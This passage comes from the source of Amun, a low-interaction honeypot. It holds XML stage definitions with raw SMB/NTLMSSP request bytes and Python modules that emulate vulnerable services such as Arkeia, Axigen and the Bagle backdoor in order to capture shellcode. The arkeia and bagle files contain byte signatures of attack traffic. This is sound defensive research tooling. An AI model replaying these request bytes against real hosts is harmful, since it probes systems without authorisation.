25 | 			<Request>\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00</Request>
26 | 		</Stage>
27 | 
28 | 		<Stage stage="5">
29 | 			<ReadBytes>106</ReadBytes>
30 | 			<Reply position="9">\x00</Reply>
31 | 			<Request>\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00</Request>
32 | 		</Stage>
33 | 		<Stage stage="6">
34 | 			<ReadBytes>160</ReadBytes>
35 | 			<Reply position="9">\x00</Reply>
36 | 			<Request>\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00</Request>
37 | 		</Stage>
38 | 	</Stages>
39 | </Vulnerability>
40 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_rync.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>RSYNC</Name>
 4 | 		<Stages>0</Stages>
 5 | 		<WelcomeMess>Rsync:25</WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>873</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>random</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_sub7.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>SUB7</Name>
 4 | 		<Stages>3</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>27347</Port>
 8 | 		</Ports>
 9 | 	</Init>
10 | </Vulnerability>
11 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_tivoli.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>TIVOLI</Name>
 4 | 		<Stages>0</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>8080</Port>
 8 | 		</Ports>
 9 | 	</Init>
10 | </Vulnerability>
11 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_trend.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>TREND_MICRO</Name>
 4 | 		<Stages>0</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>5168</Port>
 8 | 		</Ports>
 9 | 		<DefaultReply>random</DefaultReply>
10 | 	</Init>
11 | </Vulnerability>
12 | 


--------------------------------------------------------------------------------
/utils/xml_vuln_creator/xml_vnc.xml:
--------------------------------------------------------------------------------
 1 | <Vulnerability>
 2 | 	<Init>
 3 | 		<Name>RealVNC</Name>
 4 | 		<Stages>4</Stages>
 5 | 		<WelcomeMess></WelcomeMess>
 6 | 		<Ports>
 7 | 			<Port>5900</Port>
 8 | 		</Ports>
 9 | 	</Init>
10 | </Vulnerability>
11 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-analyzer/analyzer_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import analyzer_shellcodes
 21 | 
 22 | import amun_logging
 23 | 
 24 | ### Modul to analyze new vulnerabilities, get everything send to a port and send it to shellcode_manager
 25 | 
 26 | class vuln:
 27 | 	def __init__(self):
 28 | 		try:
 29 | 			self.vuln_name = "ANALYZER Vulnerability"
 30 | 			self.stage = "STAGE1"
 31 | 			self.welcome_message = ""
 32 | 			self.shellcode = []
 33 | 		except KeyboardInterrupt:
 34 | 			raise
 35 | 
 36 | 	def print_message(self, data):
 37 | 		print "\n"
 38 | 		counter = 1
 39 | 		for byte in data:
 40 | 			if counter==16:
 41 | 				ausg = hex(struct.unpack("B",byte)[0])
 42 | 				if len(ausg) == 3:
 43 | 					list = str(ausg).split("x")
 44 | 					ausg = "%sx0%s" % (list[0],list[1])
 45 | 					print ausg
 46 | 				else:
 47 | 					print ausg
 48 | 				counter = 0
 49 | 			else:
 50 | 				ausg = hex(struct.unpack("B",byte)[0])
 51 | 				if len(ausg) == 3:
 52 | 					list = str(ausg).split("x")
 53 | 					ausg = "%sx0%s" % (list[0],list[1])
 54 | 					print ausg,
 55 | 				else:
 56 | 					print ausg,
 57 | 			counter += 1
 58 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 59 | 
 60 | 	def getVulnName(self):
 61 | 		return self.vuln_name
 62 | 
 63 | 	def getCurrentStage(self):
 64 | 		return self.stage
 65 | 
 66 | 	def getWelcomeMessage(self):
 67 | 		return self.welcome_message
 68 | 
 69 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 70 | 		try:
 71 | 			self.log_obj = amun_logging.amun_logging("vuln_analyzer", vuLogger)
 72 | 
 73 | 			### construct standard reply
 74 | 			self.reply = random_reply[:62]
 75 | 
 76 | 			### prepare default resultSet
 77 | 			resultSet = {}
 78 | 			resultSet["vulnname"] = self.vuln_name
 79 | 			resultSet["accept"] = False
 80 | 			resultSet["result"] = False
 81 | 			resultSet["shutdown"] = False
 82 | 			resultSet["reply"] = "None"
 83 | 			resultSet["stage"] = self.stage
 84 | 			resultSet["shellcode"] = "None"
 85 | 			resultSet["isFile"] = False
 86 | 
 87 | 			if self.stage == "STAGE1" and bytes>0:
 88 | 				print ".::[Amun - Analyzer] collecting stage1 (bytes %s ip %s) ::." % (bytes,ip)
 89 | 				self.print_message(message)
 90 | 				resultSet['result'] = True
 91 | 				resultSet['accept'] = True
 92 | 				resultSet['reply'] = "".join(self.reply)
 93 | 				self.shellcode.append(message)
 94 | 				self.stage = "SHELLCODE"
 95 | 				return resultSet
 96 | 			elif self.stage == "SHELLCODE":
 97 | 				if bytes>0:
 98 | 					print ".::[Amun - Analyzer] collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
 99 | 					resultSet["result"] = True
100 | 					resultSet["accept"] = True
101 | 					resultSet['reply'] = "".join(self.reply)
102 | 					self.shellcode.append(message)
103 | 					self.stage = "SHELLCODE"
104 | 					return resultSet
105 | 				else:
106 | 					print ".::[Amun - Analyzer] finish collecting shellcode (bytes %s ip %s) ::." % (bytes,ip)
107 | 					resultSet["result"] = False
108 | 					resultSet["accept"] = True
109 | 					resultSet["reply"] = "None"
110 | 					self.shellcode.append(message)
111 | 					resultSet["shellcode"] = "".join(self.shellcode)
112 | 					return resultSet
113 | 			else:
114 | 				resultSet["result"] = False
115 | 				resultSet["accept"] = False
116 | 				resultSet["reply"] = "None"
117 | 				return resultSet
118 | 			return resultSet
119 | 		except KeyboardInterrupt:
120 | 			raise
121 | 		except StandardError, e:
122 | 			print e
123 | 		except:
124 | 			print "Analyzer fatal error"
125 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-analyzer/analyzer_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-analyzer/analyzer_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-arc/arc_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import arc_shellcodes
 21 | 
 22 | class vuln:
 23 | 	def __init__(self):
 24 | 		try:
 25 | 			self.vuln_name = "ARC Vulnerability"
 26 | 			self.stage = "SHELLCODE"
 27 | 			self.welcome_message = ""
 28 | 			self.shellcode = []
 29 | 		except KeyboardInterrupt:
 30 | 			raise
 31 | 
 32 | 	def print_message(self, data):
 33 | 		print "\n"
 34 | 		counter = 1
 35 | 		for byte in data:
 36 | 			if counter==16:
 37 | 				ausg = hex(struct.unpack("B",byte)[0])
 38 | 				if len(ausg) == 3:
 39 | 					list = str(ausg).split("x")
 40 | 					ausg = "%sx0%s" % (list[0],list[1])
 41 | 					print ausg
 42 | 				else:
 43 | 					print ausg
 44 | 				counter = 0
 45 | 			else:
 46 | 				ausg = hex(struct.unpack("B",byte)[0])
 47 | 				if len(ausg) == 3:
 48 | 					list = str(ausg).split("x")
 49 | 					ausg = "%sx0%s" % (list[0],list[1])
 50 | 					print ausg,
 51 | 				else:
 52 | 					print ausg,
 53 | 			counter += 1
 54 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 55 | 
 56 | 	def getVulnName(self):
 57 | 		return self.vuln_name
 58 | 
 59 | 	def getCurrentStage(self):
 60 | 		return self.stage
 61 | 
 62 | 	def getWelcomeMessage(self):
 63 | 		return self.welcome_message
 64 | 
 65 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 66 | 		try:
 67 | 			### construct standard reply
 68 | 			self.reply = random_reply[:62]
 69 | 
 70 | 			### prepare default resultSet
 71 | 			resultSet = {}
 72 | 			resultSet["vulnname"] = self.vuln_name
 73 | 			resultSet["accept"] = False
 74 | 			resultSet["result"] = False
 75 | 			resultSet["shutdown"] = False
 76 | 			resultSet["reply"] = "None"
 77 | 			resultSet["stage"] = self.stage
 78 | 			resultSet["shellcode"] = "None"
 79 | 			resultSet["isFile"] = False
 80 | 
 81 | 			if self.stage == "SHELLCODE":
 82 | 				if bytes>0:
 83 | 					resultSet["result"] = True
 84 | 					resultSet["accept"] = True
 85 | 					#resultSet["reply"] = "".join(self.reply)
 86 | 					self.shellcode.append(message)
 87 | 					self.stage = "SHELLCODE"
 88 | 					#resultSet["shellcode"] = "".join(self.shellcode)
 89 | 					return resultSet
 90 | 				else:
 91 | 					resultSet["result"] = False
 92 | 					resultSet["accept"] = True
 93 | 					resultSet["reply"] = "None"
 94 | 					self.shellcode.append(message)
 95 | 					resultSet["shellcode"] = "".join(self.shellcode)
 96 | 					return resultSet
 97 | 			else:
 98 | 				resultSet["result"] = False
 99 | 				resultSet["accept"] = False
100 | 				resultSet["reply"] = "None"
101 | 				return resultSet
102 | 			return resultSet
103 | 		except KeyboardInterrupt:
104 | 			raise
105 | 		except StandardError, e:
106 | 			print e
107 | 		except:
108 | 			print "ARC fatal error"
109 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-arc/arc_shellcodes.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/zeroq/amun/55714deb61b24a92e3ad700fce6e04f8194d3c33/vuln_modules/vuln-arc/arc_shellcodes.py


--------------------------------------------------------------------------------
/vuln_modules/vuln-arkeia/arkeia_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import amun_logging
 20 | import random
 21 | import arkeia_shellcodes
 22 | 
 23 | import traceback
 24 | import StringIO
 25 | import sys
 26 | 
 27 | class vuln:
 28 | 	def __init__(self):
 29 | 		try:
 30 | 			self.vuln_name = "ARKEIA Vulnerability"
 31 | 			self.stage = "ARKEIA_STAGE1"
 32 | 			self.welcome_message = ""
 33 | 			self.shellcode = []
 34 | 		except KeyboardInterrupt:
 35 | 			raise
 36 | 
 37 | 	def print_message(self, data):
 38 | 		print "\n"
 39 | 		counter = 1
 40 | 		for byte in data:
 41 | 			if counter==16:
 42 | 				ausg = hex(struct.unpack("B",byte)[0])
 43 | 				if len(ausg) == 3:
 44 | 					list = str(ausg).split("x")
 45 | 					ausg = "%sx0%s" % (list[0],list[1])
 46 | 					print ausg
 47 | 				else:
 48 | 					print ausg
 49 | 				counter = 0
 50 | 			else:
 51 | 				ausg = hex(struct.unpack("B",byte)[0])
 52 | 				if len(ausg) == 3:
 53 | 					list = str(ausg).split("x")
 54 | 					ausg = "%sx0%s" % (list[0],list[1])
 55 | 					print ausg,
 56 | 				else:
 57 | 					print ausg,
 58 | 			counter += 1
 59 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 60 | 
 61 | 	def getVulnName(self):
 62 | 		return self.vuln_name
 63 | 
 64 | 	def getCurrentStage(self):
 65 | 		return self.stage
 66 | 
 67 | 	def getWelcomeMessage(self):
 68 | 		return self.welcome_message
 69 | 
 70 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 71 | 		try:
 72 | 			### logging object
 73 | 			self.log_obj = amun_logging.amun_logging("vuln_arkeia", vuLogger)
 74 | 			### construct standard reply
 75 | 			self.reply = random_reply[:62]
 76 | 
 77 | 			### prepare default resultSet
 78 | 			resultSet = {}
 79 | 			resultSet["vulnname"] = self.vuln_name
 80 | 			resultSet["accept"] = False
 81 | 			resultSet["result"] = False
 82 | 			resultSet["shutdown"] = False
 83 | 			resultSet["reply"] = "None"
 84 | 			resultSet["stage"] = self.stage
 85 | 			resultSet["shellcode"] = "None"
 86 | 			resultSet["isFile"] = False
 87 | 
 88 | 			if self.stage == "ARKEIA_STAGE1" and bytes==8:
 89 | 				if arkeia_shellcodes.arkeia_request_stage_1 == message:
 90 | 					resultSet["result"] = True
 91 | 					resultSet["accept"] = True
 92 | 					resultSet["reply"] = "".join(self.reply)
 93 | 					self.stage = "SHELLCODE"
 94 | 					return resultSet
 95 | 			elif self.stage == "SHELLCODE":
 96 | 				if bytes>0:
 97 | 					print ".::[Amun - ARKEIA] collecting shellcode: %s ::." % (bytes)
 98 | 					resultSet["result"] = True
 99 | 					resultSet["accept"] = True
100 | 					resultSet["reply"] = "".join(self.reply)
101 | 					self.shellcode.append(message)
102 | 					self.stage = "SHELLCODE"
103 | 					#resultSet["shellcode"] = "".join(self.shellcode)
104 | 					return resultSet
105 | 				else:
106 | 					print ".::[Amun - ARKEIA] finish collecting shellcode (bytes %s) ::." % (bytes)
107 | 					resultSet["result"] = False
108 | 					resultSet["accept"] = True
109 | 					resultSet["reply"] = "None"
110 | 					self.shellcode.append(message)
111 | 					resultSet["shellcode"] = "".join(self.shellcode)
112 | 					return resultSet
113 | 			else:
114 | 				resultSet["result"] = False
115 | 				resultSet["accept"] = False
116 | 				resultSet["reply"] = "None"
117 | 				return resultSet
118 | 			return resultSet
119 | 		except KeyboardInterrupt:
120 | 			raise
121 | 		except StandardError, e:
122 | 			print e
123 | 			f = StringIO.StringIO()
124 | 			traceback.print_exc(file=f)
125 | 			print f.getvalue()
126 | 			sys.exit(1)
127 | 		#except:
128 | 		#	print "ARKEIA fatal error"
129 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-arkeia/arkeia_shellcodes.py:
--------------------------------------------------------------------------------
1 | arkeia_request_stage_1 = "\x00\x4d\x00\x03\x00\x01\x03\xe8"
2 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-axigen/axigen_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import struct
 19 | import random
 20 | import axigen_shellcodes
 21 | import os
 22 | 
 23 | import amun_logging
 24 | 
 25 | class vuln:
 26 | 
 27 | 	def __init__(self):
 28 | 		try:
 29 | 			self.vuln_name = "AXIGEN Vulnerability"
 30 | 			self.stage = "AXIGEN_STAGE1"
 31 | 			self.welcome_message = "220 mailserver"
 32 | 			self.shellcode = []
 33 | 		except KeyboardInterrupt:
 34 | 			raise
 35 | 
 36 | 	def print_message(self, data):
 37 | 		print "\n"
 38 | 		counter = 1
 39 | 		for byte in data:
 40 | 			if counter==16:
 41 | 				ausg = hex(struct.unpack('B',byte)[0])
 42 | 				if len(ausg) == 3:
 43 | 					list = str(ausg).split('x')
 44 | 					ausg = "%sx0%s" % (list[0],list[1])
 45 | 					print ausg
 46 | 				else:
 47 | 					print ausg
 48 | 				counter = 0
 49 | 			else:
 50 | 				ausg = hex(struct.unpack('B',byte)[0])
 51 | 				if len(ausg) == 3:
 52 | 					list = str(ausg).split('x')
 53 | 					ausg = "%sx0%s" % (list[0],list[1])
 54 | 					print ausg,
 55 | 				else:
 56 | 					print ausg,
 57 | 			counter += 1
 58 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 59 | 
 60 | 	def getVulnName(self):
 61 | 		return self.vuln_name
 62 | 
 63 | 	def getCurrentStage(self):
 64 | 		return self.stage
 65 | 
 66 | 	def getWelcomeMessage(self):
 67 | 		return self.welcome_message
 68 | 
 69 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 70 | 		try:
 71 | 			self.log_obj = amun_logging.amun_logging('vuln_axigen', vuLogger)
 72 | 
 73 | 			self.reply = []
 74 | 			for i in range(0,510):
 75 | 				try:
 76 | 					self.reply.append("\x00")
 77 | 				except KeyboardInterrupt:
 78 | 					raise
 79 | 			resultSet = {}
 80 | 			resultSet['vulnname'] = self.vuln_name
 81 | 			resultSet['result'] = False
 82 | 			resultSet['accept'] = False
 83 | 			resultSet['shutdown'] = False
 84 | 			resultSet['reply'] = "None"
 85 | 			resultSet['stage'] = self.stage
 86 | 			resultSet['shellcode'] = "None"
 87 | 			resultSet["isFile"] = False
 88 | 
 89 | 			if self.stage=="AXIGEN_STAGE1" and bytes==254:
 90 | 				resultSet['result'] = False
 91 | 				resultSet['accept'] = True
 92 | 				self.shellcode.append(message)
 93 | 				resultSet['shellcode'] = "".join(self.shellcode)
 94 | 				return resultSet
 95 | 			else:
 96 | 				resultSet['result'] = False
 97 | 				resultSet['reply'] = "None"
 98 | 				return resultSet
 99 | 			return resultSet
100 | 		except KeyboardInterrupt:
101 | 			raise
102 | 		except StandardError, e:
103 | 			print e
104 | 			return resultSet
105 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-axigen/axigen_shellcodes.py:
--------------------------------------------------------------------------------
1 | 
2 | 
3 | 
4 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-bagle/bagle_modul.py:
--------------------------------------------------------------------------------
  1 | """
  2 | [Amun - low interaction honeypot]
  3 | Copyright (C) [2014]  [Jan Goebel]
  4 | 
  5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
  6 | 
  7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
  8 | 
  9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
 10 | """
 11 | 
 12 | try:
 13 | 	import psyco ; psyco.full()
 14 | 	from psyco.classes import *
 15 | except ImportError:
 16 | 	pass
 17 | 
 18 | import traceback
 19 | import StringIO
 20 | import sys
 21 | import struct
 22 | import amun_logging
 23 | import random
 24 | import bagle_shellcodes
 25 | 
 26 | class vuln:
 27 | 	def __init__(self):
 28 | 		try:
 29 | 			self.vuln_name = "BAGLE Vulnerability"
 30 | 			self.stage = "BAGLE_STAGE1"
 31 | 			self.welcome_message = ""
 32 | 			self.shellcode = []
 33 | 		except KeyboardInterrupt:
 34 | 			raise
 35 | 
 36 | 	def print_message(self, data):
 37 | 		print "\n"
 38 | 		counter = 1
 39 | 		for byte in data:
 40 | 			if counter==16:
 41 | 				ausg = hex(struct.unpack("B",byte)[0])
 42 | 				if len(ausg) == 3:
 43 | 					list = str(ausg).split("x")
 44 | 					ausg = "%sx0%s" % (list[0],list[1])
 45 | 					print ausg
 46 | 				else:
 47 | 					print ausg
 48 | 				counter = 0
 49 | 			else:
 50 | 				ausg = hex(struct.unpack("B",byte)[0])
 51 | 				if len(ausg) == 3:
 52 | 					list = str(ausg).split("x")
 53 | 					ausg = "%sx0%s" % (list[0],list[1])
 54 | 					print ausg,
 55 | 				else:
 56 | 					print ausg,
 57 | 			counter += 1
 58 | 		print "\n>> Incoming Codesize: %s\n\n" % (len(data))
 59 | 
 60 | 	def getVulnName(self):
 61 | 		return self.vuln_name
 62 | 
 63 | 	def getCurrentStage(self):
 64 | 		return self.stage
 65 | 
 66 | 	def getWelcomeMessage(self):
 67 | 		return self.welcome_message
 68 | 
 69 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
 70 | 		try:
 71 | 			### logging object
 72 | 			self.log_obj = amun_logging.amun_logging("vuln_bagle", vuLogger)
 73 | 			### construct standard reply
 74 | 			self.reply = random_reply
 75 | 
 76 | 			### prepare default resultSet
 77 | 			resultSet = {}
 78 | 			resultSet["vulnname"] = self.vuln_name
 79 | 			resultSet["accept"] = False
 80 | 			resultSet["result"] = False
 81 | 			resultSet["shutdown"] = False
 82 | 			resultSet["reply"] = "None"
 83 | 			resultSet["stage"] = self.stage
 84 | 			resultSet["shellcode"] = "None"
 85 | 			resultSet["isFile"] = False
 86 | 
 87 | 			if bytes>0:
 88 | 				self.log_obj.log("incoming bagle: %s (length: %s)" % (message, len(message)), 9, "debug", True, True)
 89 | 
 90 | 			if self.stage == "BAGLE_STAGE1" and bytes==39:
 91 | 				if message == bagle_shellcodes.bagle_auth:
 92 | 					resultSet["result"] = True
 93 | 					resultSet["accept"] = True
 94 | 					resultSet["reply"] = "12345678"
 95 | 					self.stage = "BAGLE_STAGE2"
 96 | 					return resultSet
 97 | 			elif self.stage == "BAGLE_STAGE2":
 98 | 				resultSet["result"] = True
 99 | 				resultSet["accept"] = True
100 | 				#resultSet["reply"] = "".join(self.reply)
101 | 				self.stage = "SHELLCODE"
102 | 				return resultSet
103 | 			elif self.stage == "SHELLCODE":
104 | 				if bytes>0:
105 | 					resultSet["result"] = True
106 | 					resultSet["accept"] = True
107 | 					#resultSet["reply"] = "".join(self.reply)
108 | 					self.shellcode.append(message)
109 | 					self.stage = "SHELLCODE"
110 | 					#resultSet["shellcode"] = "".join(self.shellcode)
111 | 					return resultSet
112 | 				else:
113 | 					resultSet["result"] = False
114 | 					resultSet["accept"] = True
115 | 					resultSet["reply"] = "None"
116 | 					self.shellcode.append(message)
117 | 					resultSet["shellcode"] = "".join(self.shellcode)
118 | 					return resultSet
119 | 			else:
120 | 				resultSet["result"] = False
121 | 				resultSet["accept"] = False
122 | 				resultSet["reply"] = "None"
123 | 				return resultSet
124 | 			return resultSet
125 | 		except KeyboardInterrupt:
126 | 			raise
127 | 		except StandardError, e:
128 | 			print e
129 | 			f = StringIO.StringIO()
130 | 			traceback.print_exc(file=f)
131 | 			print f.getvalue()
132 | 			sys.exit(1)
133 | 		except:
134 | 			print "BAGLE fatal error"
135 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-bagle/bagle_shellcodes.py:
--------------------------------------------------------------------------------
1 | 
2 | bagle_auth = "\x43\xFF\xFF\xFF\x30\x30\x30\x01\x0A\x1F\x2B\x28\x2B\xA1\x32\x01\x43\xFF\xFF\xFF\x30\x30\x30\x01\x0A\x28\x91\xA1\x2B\xE6\x60\x2F\x32\x8F\x60\x15\x1A\x20\x1A"
3 | 


--------------------------------------------------------------------------------
/vuln_modules/vuln-ca/ca_modul.py:
--------------------------------------------------------------------------------
 1 | """
 2 | [Amun - low interaction honeypot]
 3 | Copyright (C) [2014]  [Jan Goebel]
 4 | 
 5 | This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
 6 | 
 7 | This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
 8 | 
 9 | You should have received a copy of the GNU General Public License along with this program; if not, see <http://www.gnu.org/licenses/>
10 | """
11 | 
12 | 
13 | try:
14 | 	import psyco ; psyco.full()
15 | 	from psyco.classes import *
16 | except ImportError:
17 | 	pass
18 | 
19 | import struct
20 | import random
21 | import ca_shellcodes
22 | 
23 | class vuln:
24 | 	def __init__(self):
25 | 		try:
26 | 			self.vuln_name = "CA Vulnerability"
27 | 			self.stage = "SHELLCODE"
28 | 			self.welcome_message = ""
29 | 			self.shellcode = []
30 | 		except KeyboardInterrupt:
31 | 			raise
32 | 
33 | 	def getVulnName(self):
34 | 		return self.vuln_name
35 | 
36 | 	def getCurrentStage(self):
37 | 		return self.stage
38 | 
39 | 	def getWelcomeMessage(self):
40 | 		return self.welcome_message
41 | 
42 | 	def incoming(self, message, bytes, ip, vuLogger, random_reply, ownIP):
43 | 		try:
44 | 			### construct standard reply
45 | 			self.reply = random_reply
46 | 
47 | 			### prepare default resultSet
48 | 			resultSet = {}
49 | 			resultSet["vulnname"] = self.vuln_name
50 | 			resultSet["accept"] = False
51 | 			resultSet["result"] = False
52 | 			resultSet["shutdown"] = False
53 | 			resultSet["reply"] = "None"
54 | 			resultSet["stage"] = self.stage
55 | 			resultSet["shellcode"] = "None"
56 | 			resultSet["isFile"] = False
57 | 
58 | 			if self.stage == "SHELLCODE":
